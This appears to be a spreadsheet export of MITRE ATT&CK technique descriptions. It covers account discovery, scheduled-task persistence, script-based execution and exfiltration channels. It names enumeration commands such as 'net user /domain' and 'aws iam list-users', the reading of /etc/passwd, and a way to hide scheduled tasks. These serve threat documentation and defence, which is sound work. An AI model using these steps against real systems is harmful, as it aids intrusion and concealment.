The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.  </t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.</t>
  </si>
  <si>
    <t>Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The &lt;code&gt;Get-MsolRole&lt;/code&gt; PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;code&gt;GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands `ListRolePolicies` and `ListAttachedRolePolicies` allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.</t>
  </si>
  <si>
    <t>Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)</t>
  </si>
  <si>
    <t>Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension &lt;code&gt;.timer&lt;/code&gt; that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the &lt;code&gt;systemctl&lt;/code&gt; command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each &lt;code&gt;.timer&lt;/code&gt; file must have a corresponding &lt;code&gt;.service&lt;/code&gt; file with the same name, e.g., &lt;code&gt;example.timer&lt;/code&gt; and &lt;code&gt;example.service&lt;/code&gt;. &lt;code&gt;.service&lt;/code&gt; files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to &lt;code&gt;/etc/systemd/system/&lt;/code&gt; and &lt;code&gt;/usr/lib/systemd/system&lt;/code&gt; while user level are written to &lt;code&gt;~/.config/systemd/user/&lt;/code&gt;.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though &lt;code&gt;at.exe&lt;/code&gt; can not access tasks created with &lt;code&gt;schtasks&lt;/code&gt; or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) </t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.</t>
  </si>
  <si>
    <t>Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the &lt;code&gt;at.allow&lt;/code&gt; file. If the &lt;code&gt;at.allow&lt;/code&gt; file does not exist, the &lt;code&gt;at.deny&lt;/code&gt; file is checked. Every username not listed in &lt;code&gt;at.deny&lt;/code&gt; is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the &lt;code&gt;at.deny&lt;/code&gt; exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via &lt;code&gt;sudo&lt;/code&gt;.(Citation: GTFObins at)</t>
  </si>
  <si>
    <t>Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands.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
Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)
Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )
DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)</t>
  </si>
  <si>
    <t>Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service &lt;code&gt;C API&lt;/code&gt; or the high level &lt;code&gt;NSXPCConnection API&lt;/code&gt; in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).</t>
  </si>
  <si>
    <t>Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)</t>
  </si>
  <si>
    <t>An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 
While [Malicious File](https://attack.mitre.org/techniques/T1204/002)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t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: &lt;code&gt;launchctl load&lt;/code&gt;,&lt;code&gt;launchctl unload&lt;/code&gt;, and &lt;code&gt;launchctl start&lt;/code&gt;. Adversaries can use scripts or manually run the commands &lt;code&gt;launchctl load -w "%s/Library/LaunchAgents/%s"&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).  
Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.
With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.  </t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the &lt;code&gt;Start-Process&lt;/code&gt; cmdlet which can be used to run an executable and the &lt;code&gt;Invoke-Command&lt;/code&gt; cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the &lt;code&gt;powershell.exe&lt;/code&gt; binary through interfaces to PowerShell's underlying &lt;code&gt;System.Management.Automation&lt;/code&gt; assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)</t>
  </si>
  <si>
    <t>Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the &lt;code&gt;python.exe&lt;/code&gt; interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.
Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.</t>
  </si>
  <si>
    <t>Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )</t>
  </si>
  <si>
    <t>Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
Scripts can be run from the command-line via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding &lt;code&gt;#!/usr/bin/osascript&lt;/code&gt; to the start of the script file.(Citation: SentinelOne AppleScript)
AppleScripts do not need to call &lt;code&gt;osascript&lt;/code&gt; to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s &lt;code&gt;NSAppleScript&lt;/code&gt; or &lt;code&gt;OSAScript&lt;/code&gt;, both of which execute code independent of the &lt;code&gt;/usr/bin/osascript&lt;/code&gt; command line utility.
Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and &lt;code&gt;sc.exe&lt;/code&gt; can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse the &lt;code&gt;cron&lt;/code&gt; utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The &lt;code&gt;cron&lt;/code&gt; utility is a time-based job scheduler for Unix-like operating systems.  The &lt;code&gt; crontab&lt;/code&gt; file contains the schedule of cron entries to be run and the specified times for execution. Any &lt;code&gt;crontab&lt;/code&gt; files are stored in operating system-specific file paths.
An adversary may use &lt;code&gt;cron&lt;/code&gt; in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). </t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as &lt;code&gt;pastebin[.]com&lt;/code&gt;, are commonly used by developers to share code and other information.  
Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application. 
Adversaries may link an adversary-owned environment to a victim-owned SaaS service to achieve repeated [Automated Exfiltration](https://attack.mitre.org/techniques/T1020) of emails, chat messages, and other data.(Citation: Push Security SaaS Attacks Repository Webhooks) Alternatively, instead of linking the webhook endpoint to a service, an adversary can manually post staged data directly to the URL in order to exfiltrate it.(Citation: Microsoft SQL Server)
Access to webhook endpoints is often over HTTPS, which gives the adversary an additional level of protection. Exfiltration leveraging webhooks can also blend in with normal network traffic if the webhook endpoint points to a commonly used SaaS application or collaboration service.(Citation: CyberArk Labs Discord)(Citation: Talos Discord Webhook Abuse)(Citation: Checkmarx Webhooks)</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)
